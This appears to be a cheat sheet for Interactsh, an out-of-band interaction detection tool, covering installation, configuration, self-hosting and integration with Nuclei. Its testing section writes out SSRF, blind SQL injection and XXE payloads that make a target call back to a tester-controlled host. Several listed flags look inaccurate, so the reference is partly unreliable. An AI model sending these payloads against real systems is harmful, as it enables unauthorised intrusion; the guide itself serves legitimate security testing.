Interactsh OOB Interaction Gathering Cheat Sheet

Overview

Interactsh is an open-source tool developed by Project Discovery for detecting out-of-band (OOB) interactions. It's designed to identify vulnerabilities that cause external interactions, such as Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, and other vulnerabilities that may not be immediately visible through traditional testing methods.

What makes Interactsh unique is its comprehensive approach to OOB testing. Unlike other tools that focus on specific protocols, Interactsh can detect interactions across multiple protocols, including DNS, HTTP(S), SMTP(S), and LDAP. It consists of both a server component that captures and logs these interactions and a client component that generates unique testing URLs and monitors for any interactions with those URLs.

Interactsh is widely used in security testing to identify vulnerabilities that might otherwise go undetected. It's particularly valuable for bug bounty hunters, penetration testers, and security researchers who need to verify the existence of vulnerabilities that rely on external interactions. The tool is also integrated with Nuclei, another Project Discovery tool, enabling automated vulnerability scanning with OOB detection capabilities.

Installation

Client Installation

Using Go

bash

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version

Using Docker

bash

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h

Using Homebrew (macOS)

bash

# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version

Using PDTM (Project Discovery Tools Manager)

bash

# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version

Server Installation (Self-Hosted)

Using Go

bash

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version

Using Docker

bash

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h

Basic Usage

Client Usage

bash

# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com

Server Usage (Self-Hosted)

bash

# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v

Output Options

bash

# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent

Client Configuration

Basic Configuration

bash

# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id

Authentication

bash

# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token

Filtering

bash

# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"

Server Configuration (Self-Hosted)

Domain Configuration

bash

# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4

Certificate Configuration

bash

# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem

Authentication Configuration

bash

# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt

Advanced Usage

Client Advanced Features

bash

# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "{{random}}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only

Server Advanced Features

bash

# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics

Payload Generation

bash

# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com

Integration with Other Tools

Integration with Nuclei

bash

# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh

Integration with Notify

bash

# Send Interactsh interactions to Discord
interactsh-client | notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http | notify -provider slack

Integration with Custom Scripts

bash

# Use Interactsh in a bash script
#!/bin/bash
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing Vulnerabilities

Testing SSRF

bash

# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

bash

# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing XXE Injection

bash

# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Troubleshooting

Common Issues

No Interactions Detected

bash

# Increase polling interval
interactsh-client -poll-interval 10

# Increase interaction timeout
interactsh-client -interaction-timeout 120

# Check if the target is behind a firewall
# Try using different protocols (DNS, HTTP, SMTP)

Connection Issues

bash

# Check if the server is reachable
ping your-interactsh-server.com

# Try a different server
interactsh-client -server oast.pro

# Check if your network allows outbound connections

Authentication Issues

bash

# Verify token
interactsh-client -server your-interactsh-server.com -token your-auth-token -v

# Check if the server requires authentication

Server Setup Issues

bash

# Check DNS configuration
dig ns your-domain.com

# Verify that your domain's nameservers point to your server
# Ensure that your server has the necessary ports open

Debugging

bash

# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug

Self-Hosting Guide

DNS Configuration

To self-host Interactsh, you need to configure your domain's DNS settings:

Set up NS records for your domain to point to your server:

your-domain.com. IN NS ns1.your-domain.com.
your-domain.com. IN NS ns2.your-domain.com.

Set up A records for your nameservers:

ns1.your-domain.com. IN A your-server-ip
ns2.your-domain.com. IN A your-server-ip

Server Setup

bash

# Start the server with your domain
interactsh-server -domain your-domain.com

# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt

# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token

Docker Deployment

bash

# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF

# Start the server
docker-compose up -d

Configuration

Client Configuration File

Interactsh client uses a configuration file located at $HOME/.config/interactsh-client/config.yaml. You can customize various settings in this file:

yaml

# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http

Server Configuration File

Interactsh server uses a configuration file located at $HOME/.config/interactsh-server/config.yaml. You can customize various settings in this file:

yaml

# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token

Environment Variables

bash

# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60

# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token

Reference

Client Command Line Options

Flag	Description
`-server`	Interactsh server to use
`-token`	Authentication token for the server
`-n`	Number of URLs to generate
`-o, -output`	File to write output to
`-json`	Write output in JSON format
`-v, -verbose`	Show verbose output
`-debug`	Show debug information
`-poll-interval`	Polling interval in seconds
`-interaction-timeout`	Interaction timeout in seconds
`-persistent-session`	Enable persistent session
`-correlation-id`	Correlation ID for the session
`-filter-type`	Filter interactions by type (dns, http, smtp, ldap)
`-filter-ip`	Filter interactions by IP
`-filter-content`	Filter interactions by content
`-generate-url`	Generate URL for testing
`-dns-only`	Enable DNS callback only
`-http-only`	Enable HTTP callback only
`-smtp-only`	Enable SMTP callback only
`-ldap-only`	Enable LDAP callback only
`-payload-template`	Custom payload template
`-version`	Show Interactsh client version

Server Command Line Options

Flag	Description
`-domain`	Domain to use for the server
`-ip`	IP address to listen on
`-wildcard`	Enable wildcard domain
`-letsencrypt`	Use Let's Encrypt for certificates
`-cert`	Path to certificate file
`-key`	Path to key file
`-auth`	Enable authentication
`-auth-token`	Authentication token
`-auth-token-file`	File containing authentication tokens
`-dns`	Enable DNS service
`-http`	Enable HTTP service
`-smtp`	Enable SMTP service
`-ldap`	Enable LDAP service
`-no-dns`	Disable DNS service
`-no-http`	Disable HTTP service
`-no-smtp`	Disable SMTP service
`-no-ldap`	Disable LDAP service
`-dns-port`	Port for DNS service
`-http-port`	Port for HTTP service
`-https-port`	Port for HTTPS service
`-smtp-port`	Port for SMTP service
`-smtps-port`	Port for SMTPS service
`-ldap-port`	Port for LDAP service
`-metrics`	Enable metrics
`-v, -verbose`	Show verbose output
`-debug`	Show debug information
`-version`	Show Interactsh server version

Supported Interaction Types

Type	Description
`dns`	DNS interactions
`http`	HTTP/HTTPS interactions
`smtp`	SMTP/SMTPS interactions
`ldap`	LDAP interactions

Resources

This cheat sheet provides a comprehensive reference for using Interactsh, from basic client and server usage to advanced configuration and integration with other tools. For the most up-to-date information, always refer to the official documentation.

Interactsh OOB Interaction Gathering Cheat Sheet ​

Overview ​

Installation ​

Client Installation ​

Using Go ​

Using Docker ​

Using Homebrew (macOS) ​

Using PDTM (Project Discovery Tools Manager) ​

Server Installation (Self-Hosted) ​

Using Go ​

Using Docker ​

Basic Usage ​

Client Usage ​

Server Usage (Self-Hosted) ​

Output Options ​

Client Configuration ​

Basic Configuration ​

Authentication ​

Filtering ​

Server Configuration (Self-Hosted) ​

Domain Configuration ​

Certificate Configuration ​

Authentication Configuration ​

Advanced Usage ​

Client Advanced Features ​

Server Advanced Features ​

Payload Generation ​

Integration with Other Tools ​

Integration with Nuclei ​

Integration with Notify ​

Integration with Custom Scripts ​

Testing Vulnerabilities ​

Testing SSRF ​

Testing Blind SQL Injection ​

Testing XXE Injection ​

Troubleshooting ​

Common Issues ​

Debugging ​

Self-Hosting Guide ​

DNS Configuration ​

Server Setup ​

Docker Deployment ​

Configuration ​

Client Configuration File ​

Server Configuration File ​

Environment Variables ​

Reference ​

Client Command Line Options ​

Server Command Line Options ​

Supported Interaction Types ​

Resources ​

Interactsh OOB Interaction Gathering Cheat Sheet

Overview

Installation

Client Installation

Using Go

Using Docker

Using Homebrew (macOS)

Using PDTM (Project Discovery Tools Manager)

Server Installation (Self-Hosted)

Using Go

Using Docker

Basic Usage

Client Usage

Server Usage (Self-Hosted)

Output Options

Client Configuration

Basic Configuration

Authentication

Filtering

Server Configuration (Self-Hosted)

Domain Configuration

Certificate Configuration

Authentication Configuration

Advanced Usage

Client Advanced Features

Server Advanced Features

Payload Generation

Integration with Other Tools

Integration with Nuclei

Integration with Notify

Integration with Custom Scripts

Testing Vulnerabilities

Testing SSRF

Testing Blind SQL Injection

Testing XXE Injection

Troubleshooting

Common Issues

Debugging

Self-Hosting Guide

DNS Configuration

Server Setup

Docker Deployment

Configuration

Client Configuration File

Server Configuration File

Environment Variables

Reference

Client Command Line Options

Server Command Line Options

Supported Interaction Types

Resources